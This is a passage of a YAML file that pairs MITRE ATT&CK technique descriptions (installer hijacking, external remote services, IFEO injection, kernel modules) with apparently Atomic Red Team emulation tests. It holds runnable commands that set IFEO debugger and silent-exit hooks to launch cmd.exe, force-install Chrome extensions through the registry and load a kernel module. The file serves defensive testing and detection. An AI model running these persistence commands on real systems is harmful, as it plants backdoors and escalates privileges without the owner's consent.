8). 
Executable installers are - vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation - of privilege. Retrieved December 4, 2014.' - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Executable Installer File Permissions Weakness - description: |- - Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM. - - Another variation of this technique can be performed by taking advantage of a weakness that is common in executable, self-extracting installers. During the installation process, it is common for installers to use a subdirectory within the %TEMP% directory to unpack binaries such as DLLs, EXEs, or other payloads. When installers create subdirectories and files they often do not set appropriate permissions to restrict write access, which allows for execution of untrusted code placed in the subdirectories or overwriting of binaries used in the installation process. This behavior is related to and may take advantage of [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001). - - Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. 
Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002). Several examples of this weakness in existing common installers have been reported to software vendors.(Citation: mozilla_sec_adv_2012) (Citation: Executable Installers are Vulnerable) If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence. - id: attack-pattern--70d81154-b187-45f9-8ec5-295d01255979 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-03-26T19:20:23.030Z' - created: '2020-03-13T11:12:18.558Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - Administrator - - User - x_mitre_effective_permissions: - - Administrator - - User - - SYSTEM - x_mitre_detection: |- - Look for changes to binaries and service executables that may normally occur during software updates. If an executable is written, renamed, and/or moved to match an existing service executable, it could be detected and correlated with other suspicious behavior. Hashing of binaries and service executables could be used to detect replacement against historical data. - - Look for abnormal process call trees from typical processes and services and for execution of other commands that could relate to Discovery or other adversary techniques. 
- x_mitre_data_sources: - - Process command-line parameters - - File monitoring - x_mitre_contributors: - - Travis Smith, Tripwire - - Stefan Kanthak - x_mitre_platforms: - - Windows - atomic_tests: [] - T1133: - technique: - id: attack-pattern--10d51417-ee35-4589-b1ff-b6df1c334e8d - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: External Remote Services - description: |- - Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) can also be used externally. - - Access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credentials from users after compromising the enterprise network.(Citation: Volexity Virtual Private Keylogging) Access to remote services may be used as a redundant or persistent access mechanism during an operation. - external_references: - - source_name: mitre-attack - external_id: T1133 - url: https://attack.mitre.org/techniques/T1133 - - external_id: CAPEC-555 - source_name: capec - url: https://capec.mitre.org/data/definitions/555.html - - url: https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/ - description: 'Adair, S. (2015, October 7). Virtual Private Keylogging: Cisco - Web VPNs Leveraged for Access and Persistence. Retrieved March 20, 2017.' 
- source_name: Volexity Virtual Private Keylogging - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: initial-access - modified: '2020-06-19T20:07:09.600Z' - created: '2017-05-31T21:31:44.421Z' - x_mitre_is_subtechnique: false - x_mitre_platforms: - - Windows - - Linux - x_mitre_permissions_required: - - User - x_mitre_detection: Follow best practices for detecting adversary use of [Valid - Accounts](https://attack.mitre.org/techniques/T1078) for authenticating to - remote services. Collect authentication logs and analyze for unusual access - patterns, windows of activity, and access outside of normal business hours. - x_mitre_data_sources: - - Authentication logs - x_mitre_contributors: - - Daniel Oakley - - Travis Smith, Tripwire - x_mitre_version: '2.1' - identifier: T1133 - atomic_tests: - - name: Running Chrome VPN Extensions via the Registry 2 vpn extension - auto_generated_guid: 4c8db261-a58b-42a6-a866-0a294deedde4 - description: 'Running Chrome VPN Extensions via the Registry install 2 vpn extension, - please see "T1133\src\list of vpn extension.txt" to view complete list - -' - supported_platforms: - - windows - input_arguments: - chrome_url: - description: chrome installer download URL - type: url - default: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BFD62DDBC-14C6-20BD-706F-C7744738E422%7D%26lang%3Den%26browser%3D3%26usagestats%3D0%26appname%3DGoogle%2520Chrome%26needsadmin%3Dprefers%26ap%3Dx64-stable-statsdef_1%26installdataindex%3Dempty/chrome/install/ChromeStandaloneSetup64.exe - extension_id: - description: chrome extension id - type: String - default: '"fcfhplploccackoneaefokcmbjfbkenj", "fdcgdnkidjaadafnichfpabhfomcebme" - -' - dependency_executor_name: powershell - dependencies: - - description: 'Chrome must be 
installed - -' - prereq_command: if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe") - -Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) - {exit 0} else {exit 1} - get_prereq_command: "Invoke-WebRequest -OutFile $env:temp\\ChromeStandaloneSetup64.exe - #{chrome_url}\nStart-Process $env:temp\\ChromeStandaloneSetup64.exe /S \n" - executor: - name: powershell - elevation_required: true - command: | - $extList = #{extension_id} - foreach ($extension in $extList) { - New-Item -Path HKLM:\Software\Wow6432Node\Google\Chrome\Extensions\$extension -Force - New-ItemProperty -Path "HKLM:\Software\Wow6432Node\Google\Chrome\Extensions\$extension" -Name "update_url" -Value "https://clients2.google.com/service/update2/crx" -PropertyType "String" -Force} - Start chrome - Start-Sleep -Seconds 30 - Stop-Process -Name "chrome" - cleanup_command: | - $extList = #{extension_id} - foreach ($extension in $extList) { - Remove-Item -Path "HKLM:\Software\Wow6432Node\Google\Chrome\Extensions\$extension" -ErrorAction Ignore} - T1574: - technique: - external_references: - - source_name: mitre-attack - external_id: T1574 - url: https://attack.mitre.org/techniques/T1574 - - source_name: Autoruns for Windows - url: https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns - description: Mark Russinovich. (2019, June 28). Autoruns for Windows v13.96. - Retrieved March 13, 2020. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Hijack Execution Flow - description: |- - Adversaries may execute their own malicious payloads by hijacking the way operating systems run programs. Hijacking execution flow can be for the purposes of persistence, since this hijacked execution may reoccur over time. Adversaries may also use these mechanisms to elevate privileges or evade defenses, such as application control or other restrictions on execution. 
- - There are many ways an adversary may hijack the flow of execution, including by manipulating how the operating system locates programs to be executed. How the operating system locates libraries to be used by a program can also be intercepted. Locations where the operating system looks for programs/resources, such as file directories and in the case of Windows the Registry, could also be poisoned to include malicious payloads. - id: attack-pattern--aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-10-17T15:15:28.288Z' - created: '2020-03-12T20:38:12.465Z' - x_mitre_data_sources: - - Environment variable - - Loaded DLLs - - Process command-line parameters - - Process monitoring - - File monitoring - - DLL monitoring - x_mitre_detection: |- - Monitor file systems for moving, renaming, replacing, or modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared with past behavior) that do not correlate with known software, patches, etc., are suspicious. Monitor DLLs loaded into a process and detect DLLs that have the same file name but abnormal paths. Modifications to or creation of .manifest and .local redirection files that do not correlate with software updates are suspicious. - - Look for changes to binaries and service executables that may normally occur during software updates. If an executable is written, renamed, and/or moved to match an existing service executable, it could be detected and correlated with other suspicious behavior. Hashing of binaries and service executables could be used to detect replacement against historical data. - - Monitor for changes to environment variables, as well as the commands to implement these changes. 
- - Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so, abnormal process call trees). Track library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates. - - Service changes are reflected in the Registry. Modification to existing services should not occur frequently. If a service binary path or failure parameters are changed to values that are not typical for that service and does not correlate with software updates, then it may be due to malicious activity. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. - - Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current service information. (Citation: Autoruns for Windows) Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data. - x_mitre_defense_bypassed: - - Anti-virus - - Application control - x_mitre_version: '1.0' - x_mitre_is_subtechnique: false - x_mitre_platforms: - - Linux - - macOS - - Windows - atomic_tests: [] - T1062: - technique: - id: attack-pattern--4be89c7c-ace6-4876-9377-c8d54cef3d63 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Hypervisor - description: |- - **This technique has been deprecated and should no longer be used.** - - A type-1 hypervisor is a software layer that sits between the guest operating systems and system's hardware. (Citation: Wikipedia Hypervisor) It presents a virtual running environment to an operating system. An example of a common hypervisor is Xen. 
(Citation: Wikipedia Xen) A type-1 hypervisor operates at a level below the operating system and could be designed with [Rootkit](https://attack.mitre.org/techniques/T1014) functionality to hide its existence from the guest operating system. (Citation: Myers 2007) A malicious hypervisor of this nature could be used to persist on systems through interruption. - external_references: - - source_name: mitre-attack - external_id: T1062 - url: https://attack.mitre.org/techniques/T1062 - - external_id: CAPEC-552 - source_name: capec - url: https://capec.mitre.org/data/definitions/552.html - - url: https://en.wikipedia.org/wiki/Hypervisor - description: Wikipedia. (2016, May 23). Hypervisor. Retrieved June 11, 2016. - source_name: Wikipedia Hypervisor - - url: http://en.wikipedia.org/wiki/Xen - description: Xen. (n.d.). In Wikipedia. Retrieved November 13, 2014. - source_name: Wikipedia Xen - - url: http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.90.8832&rep=rep1&type=pdf - description: Myers, M., and Youndt, S. (2007). An Introduction to Hardware-Assisted - Virtual Machine (HVM) Rootkits. Retrieved November 13, 2014. - source_name: Myers 2007 - - url: http://virtualization.info/en/news/2006/08/debunking-blue-pill-myth.html - description: virtualization.info. (Interviewer) & Liguori, A. (Interviewee). - (2006, August 11). Debunking Blue Pill myth [Interview transcript]. - Retrieved November 13, 2014. - source_name: virtualization.info 2006 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-03-30T13:44:04.712Z' - created: '2017-05-31T21:30:50.958Z' - x_mitre_deprecated: true - x_mitre_is_subtechnique: false - x_mitre_platforms: - - Windows - x_mitre_permissions_required: - - Administrator - - SYSTEM - x_mitre_detection: 'Type-1 hypervisors may be detected by performing timing - analysis. 
Hypervisors emulate certain CPU instructions that would normally - be executed by the hardware. If an instruction takes orders of magnitude longer - to execute than normal on a system that should not contain a hypervisor, one - may be present. (Citation: virtualization.info 2006)' - x_mitre_data_sources: - - System calls - x_mitre_version: '2.0' - atomic_tests: [] - T1546.012: - technique: - external_references: - - source_name: mitre-attack - external_id: T1546.012 - url: https://attack.mitre.org/techniques/T1546/012 - - url: https://blogs.msdn.microsoft.com/mithuns/2010/03/24/image-file-execution-options-ifeo/ - description: Shanbhag, M. (2010, March 24). Image File Execution Options (IFEO). - Retrieved December 18, 2017. - source_name: Microsoft Dev Blog IFEO Mar 2010 - - url: https://docs.microsoft.com/windows-hardware/drivers/debugger/gflags-overview - description: Microsoft. (2017, May 23). GFlags Overview. Retrieved December - 18, 2017. - source_name: Microsoft GFlags Mar 2017 - - url: https://docs.microsoft.com/windows-hardware/drivers/debugger/registry-entries-for-silent-process-exit - description: Marshall, D. & Griffin, S. (2017, November 28). Monitoring Silent - Process Exit. Retrieved June 27, 2018. - source_name: Microsoft Silent Process Exit NOV 2017 - - url: https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/ - description: Moe, O. (2018, April 10). Persistence using GlobalFlags in Image - File Execution Options - Hidden from Autoruns.exe. Retrieved June 27, 2018. - source_name: Oddvar Moe IFEO APR 2018 - - url: http://blog.crowdstrike.com/registry-analysis-with-crowdresponse/ - description: Tilbury, C. (2014, August 28). Registry Analysis with CrowdResponse. - Retrieved November 12, 2014. - source_name: Tilbury 2014 - - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process - description: 'Hosseini, A. 
(2017, July 18). Ten Process Injection Techniques: - A Technical Survey Of Common And Trending Process Injection Techniques. - Retrieved December 7, 2017.' - source_name: Endgame Process Injection July 2017 - - url: https://www.f-secure.com/v-descs/backdoor_w32_hupigon_emv.shtml - description: FSecure. (n.d.). Backdoor - W32/Hupigon.EMV - Threat Description. - Retrieved December 18, 2017. - source_name: FSecure Hupigon - - url: https://www.symantec.com/security_response/writeup.jsp?docid=2008-062807-2501-99&tabid=2 - description: Symantec. (2008, June 28). Trojan.Ushedix. Retrieved December - 18, 2017. - source_name: Symantec Ushedix June 2008 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Image File Execution Options Injection - description: |- - Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., C:\dbg\ntsd.exe -g notepad.exe). (Citation: Microsoft Dev Blog IFEO Mar 2010) - - IFEOs can be set directly via the Registry or in Global Flags via the GFlags tool. (Citation: Microsoft GFlags Mar 2017) IFEOs are represented as Debugger values in the Registry under HKLM\SOFTWARE{\Wow6432Node}\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ where <executable> is the binary on which the debugger is attached. (Citation: Microsoft Dev Blog IFEO Mar 2010) - - IFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). 
(Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IFEO and silent process exit Registry values in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\. (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) - - Similar to [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), on Windows Vista and later as well as Windows Server 2008 and later, a Registry key may be modified that configures "cmd.exe," or another program that provides backdoor access, as a "debugger" for an accessibility program (ex: utilman.exe). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the "debugger" program to be executed with SYSTEM privileges. (Citation: Tilbury 2014) - - Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), these values may also be abused to obtain privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer. (Citation: Endgame Process Injection July 2017) Installing IFEO mechanisms may also provide Persistence via continuous triggered invocation. - - Malware may also use IFEO to [Impair Defenses](https://attack.mitre.org/techniques/T1562) by registering invalid debuggers that redirect and effectively disable various system and security applications. 
(Citation: FSecure Hupigon) (Citation: Symantec Ushedix June 2008) - id: attack-pattern--6d4a7fb3-5a24-42be-ae61-6728a2b581f6 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-08-26T14:18:08.480Z' - created: '2020-01-24T15:05:58.384Z' - x_mitre_version: '1.1' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - Administrator - - SYSTEM - x_mitre_detection: |- - Monitor for abnormal usage of the GFlags tool as well as common processes spawned under abnormal parents and/or with creation flags indicative of debugging such as DEBUG_PROCESS and DEBUG_ONLY_THIS_PROCESS. (Citation: Microsoft Dev Blog IFEO Mar 2010) - - Monitor Registry values associated with IFEOs, as well as silent process exit monitoring, for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. 
(Citation: Endgame Process Injection July 2017) - x_mitre_data_sources: - - API monitoring - - Windows event logs - - Windows Registry - - Process command-line parameters - - Process monitoring - x_mitre_contributors: - - Oddvar Moe, @oddvarmoe - x_mitre_platforms: - - Windows - identifier: T1546.012 - atomic_tests: - - name: IFEO Add Debugger - auto_generated_guid: fdda2626-5234-4c90-b163-60849a24c0b8 - description: 'Leverage Global Flags Settings - -' - supported_platforms: - - windows - input_arguments: - target_binary: - description: Binary To Attach To - type: Path - default: C:\Windows\System32\calc.exe - payload_binary: - description: Binary To Execute - type: Path - default: C:\Windows\System32\cmd.exe - executor: - command: 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image - File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}" - -' - cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows - NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger - /f >nul 2>&1 - -' - name: command_prompt - elevation_required: true - - name: IFEO Global Flags - auto_generated_guid: 46b1f278-c8ee-4aa5-acce-65e77b11f3c1 - description: 'Leverage Global Flags Settings - -' - supported_platforms: - - windows - input_arguments: - target_binary: - description: Binary To Attach To - type: Path - default: C:\Windows\System32\notepad.exe - payload_binary: - description: Binary To Execute - type: Path - default: C:\Windows\System32\cmd.exe - executor: - command: | - REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v GlobalFlag /t REG_DWORD /d 512 - REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v ReportingMode /t REG_DWORD /d 1 - REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v MonitorProcess /d "#{payload_binary}" - cleanup_command: | - reg delete 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v GlobalFlag /f >nul 2>&1 - reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v ReportingMode /f >nul 2>&1 - reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v MonitorProcess /f >nul 2>&1 - name: command_prompt - elevation_required: true - T1525: - technique: - external_references: - - source_name: mitre-attack - external_id: T1525 - url: https://attack.mitre.org/techniques/T1525 - - source_name: Rhino Labs Cloud Image Backdoor Technique Sept 2019 - url: https://rhinosecuritylabs.com/aws/cloud-container-attack-tool/ - description: Rhino Labs. (2019, August). Exploiting AWS ECR and ECS with the - Cloud Container Attack Tool (CCAT). Retrieved September 12, 2019. - - source_name: Rhino Labs Cloud Backdoor September 2019 - url: https://github.com/RhinoSecurityLabs/ccat - description: Rhino Labs. (2019, September). Cloud Container Attack Tool (CCAT). - Retrieved September 12, 2019. - - source_name: ATT Cybersecurity Cryptocurrency Attacks on Cloud - url: https://www.alienvault.com/blogs/labs-research/making-it-rain-cryptocurrency-mining-attacks-in-the-cloud - description: Doman, C. & Hegel, T.. (2019, March 14). Making it Rain - Cryptocurrency - Mining Attacks in the Cloud. Retrieved October 3, 2019. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Implant Container Image - description: "Adversaries may implant cloud container images with malicious - code to establish persistence. Amazon Web Service (AWS) Amazon Machine Images - (AMI), Google Cloud Platform (GCP) Images, and Azure Images as well as popular - container runtimes such as Docker can be implanted or backdoored. 
Depending - on how the infrastructure is provisioned, this could provide persistent access - if the infrastructure provisioning tool is instructed to always use the latest - image.(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019)\n\nA - tool has been developed to facilitate planting backdoors in cloud container - images.(Citation: Rhino Labs Cloud Backdoor September 2019) If an attacker - has access to a compromised AWS instance, and permissions to list the available - container images, they may implant a backdoor such as a [Web Shell](https://attack.mitre.org/techniques/T1505/003).(Citation: - Rhino Labs Cloud Image Backdoor Technique Sept 2019) Adversaries may also - implant Docker images that may be inadvertently used in cloud deployments, - which has been reported in some instances of cryptomining botnets.(Citation: - ATT Cybersecurity Cryptocurrency Attacks on Cloud) " - id: attack-pattern--4fd8a28b-4b3a-4cd6-a8cf-85ba5f824a7f - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-03-25T22:47:34.137Z' - created: '2019-09-04T12:04:03.552Z' - x_mitre_is_subtechnique: false - x_mitre_data_sources: - - File monitoring - - Asset management - x_mitre_detection: Monitor interactions with images and containers by users - to identify ones that are added or modified anomalously. - x_mitre_permissions_required: - - User - x_mitre_version: '1.0' - x_mitre_contributors: - - Praetorian - x_mitre_platforms: - - GCP - - Azure - - AWS - atomic_tests: [] - T1547.006: - technique: - external_references: - - source_name: mitre-attack - external_id: T1547.006 - url: https://attack.mitre.org/techniques/T1547/006 - - source_name: Linux Kernel Programming - url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf - description: Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel - Module Programming Guide. Retrieved April 6, 2018. 
- - url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html - description: Pomerantz, O., Salzman, P. (2003, April 4). Modules vs Programs. - Retrieved April 6, 2018. - source_name: Linux Kernel Module Programming Guide - - url: http://www.megasecurity.org/papers/Rootkits.pdf - description: Chuvakin, A. (2003, February). An Overview of Rootkits. Retrieved - April 6, 2018. - source_name: iDefense Rootkit Overview - - url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html - description: 'Case, A. (2012, October 10). Phalanx 2 Revealed: Using Volatility - to Analyze an Advanced Linux Rootkit. Retrieved April 9, 2018.' - source_name: Volatility Phalanx2 - - url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/ - description: Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit. - Retrieved December 21, 2017. - source_name: CrowdStrike Linux Rootkit - - url: https://github.com/f0rb1dd3n/Reptile - description: Augusto, I. (2018, March 8). Reptile - LMK Linux rootkit. Retrieved - April 9, 2018. - source_name: GitHub Reptile - - url: https://github.com/m0nad/Diamorphine - description: Mello, V. (2018, March 8). Diamorphine - LMK rootkit for Linux - Kernels 2.6.x/3.x/4.x (x86 and x86_64). Retrieved April 9, 2018. - source_name: GitHub Diamorphine - - url: https://www.rsaconference.com/writable/presentations/file_upload/ht-r03-malware-persistence-on-os-x-yosemite_final.pdf - description: Wardle, P. (2015, April). Malware Persistence on OS X Yosemite. - Retrieved April 6, 2018. - source_name: RSAC 2015 San Francisco Patrick Wardle - - url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/ - description: Wardle, P. (2017, September 8). High Sierra’s ‘Secure Kernel - Extension Loading’ is Broken. Retrieved April 6, 2018. 
- source_name: Synack Secure Kernel Extension Broken - - url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/ - description: 'Mikhail, K. (2014, October 16). The Ventir Trojan: assemble - your MacOS spy. Retrieved April 6, 2018.' - source_name: Securelist Ventir - - source_name: Trend Micro Skidmap - url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/ - description: Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux - Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload. - Retrieved June 4, 2020. - - url: http://tldp.org/HOWTO/Module-HOWTO/x197.html - description: Henderson, B. (2006, September 24). How To Insert And Remove - LKMs. Retrieved April 9, 2018. - source_name: Linux Loadable Kernel Module Insert and Remove LKMs - - url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux - description: Wikipedia. (2018, March 17). Loadable kernel module. Retrieved - April 9, 2018. - source_name: Wikipedia Loadable Kernel Module - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Kernel Modules and Extensions - description: |- - Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system. (Citation: Linux Kernel Programming)  - - When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0). 
(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors and enabling root access to non-privileged users. (Citation: iDefense Rootkit Overview) - - Kernel extensions, also called kext, are used for macOS to load functionality onto a system similar to LKMs for Linux. They are loaded and unloaded through kextload and kextunload commands. - - Adversaries can use LKMs and kexts to covertly persist on a system and elevate privileges. Examples have been found in the wild and there are some open source projects. (Citation: Volatility Phalanx2) (Citation: CrowdStrike Linux Rootkit) (Citation: GitHub Reptile) (Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle) (Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir) (Citation: Trend Micro Skidmap) - id: attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-06-30T21:23:15.188Z' - created: '2020-01-24T17:42:23.339Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - root - x_mitre_detection: |- - Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands:modprobe, insmod, lsmod, rmmod, or modinfo (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module) - - For macOS, monitor for execution of kextload commands and correlate with other unknown or suspicious activity. 
- - Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r) On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r) - x_mitre_data_sources: - - Process monitoring - - Process command-line parameters - x_mitre_contributors: - - Anastasios Pingios - - Jeremy Galloway - - Red Canary - x_mitre_platforms: - - macOS - - Linux - identifier: T1547.006 - atomic_tests: - - name: Linux - Load Kernel Module via insmod - auto_generated_guid: 687dcb93-9656-4853-9c36-9977315e9d23 - description: 'This test uses the insmod command to load a kernel module for - Linux. - -' - supported_platforms: - - linux - input_arguments: - module_name: - description: Name of the kernel module name. - type: string - default: T1547006 - module_path: - description: Folder used to store the module. - type: path - default: "/tmp/T1547.006/T1547006.ko" - temp_folder: - description: Temp folder used to compile the code. 
- type: path - default: "/tmp/T1547.006" - module_source_path: - description: Path to download Gsecdump binary file - type: url - default: PathToAtomicsFolder/T1547.006/src - dependency_executor_name: bash - dependencies: - - description: 'The kernel module must exist on disk at specified location - -' - prereq_command: 'if [ -f #{module_path} ]; then exit 0; else exit 1; fi; - -' - get_prereq_command: | - if [ ! -d #{temp_folder} ]; then mkdir #{temp_folder}; touch #{temp_folder}/safe_to_delete; fi; - cp #{module_source_path}/* #{temp_folder}/ - cd #{temp_folder}; make - if [ ! -f #{module_path} ]; then mv #{temp_folder}/#{module_name}.ko #{module_path}; fi; - executor: - command: 'sudo insmod #{module_path} - -' - cleanup_command: | - sudo rmmod #{module_name} - [ -f #{temp_folder}/safe_to_delete ] && rm -rf #{temp_folder} - name: bash - elevation_required: true - T1546.006: - technique: - external_references: - - source_name: mitre-attack - external_id: T1546.006 - url: https://attack.mitre.org/techniques/T1546/006 - - url: https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf - description: Patrick Wardle. (2015). Writing Bad @$$ Malware for OS X. Retrieved - July 10, 2017. - source_name: Writing Bad Malware for OSX - - url: https://www.rsaconference.com/writable/presentations/file_upload/ht-r03-malware-persistence-on-os-x-yosemite_final.pdf - description: Patrick Wardle. (2015). Malware Persistence on OS X Yosemite. - Retrieved July 10, 2017. - source_name: Malware Persistence on OS X - object_marking_refs: - - 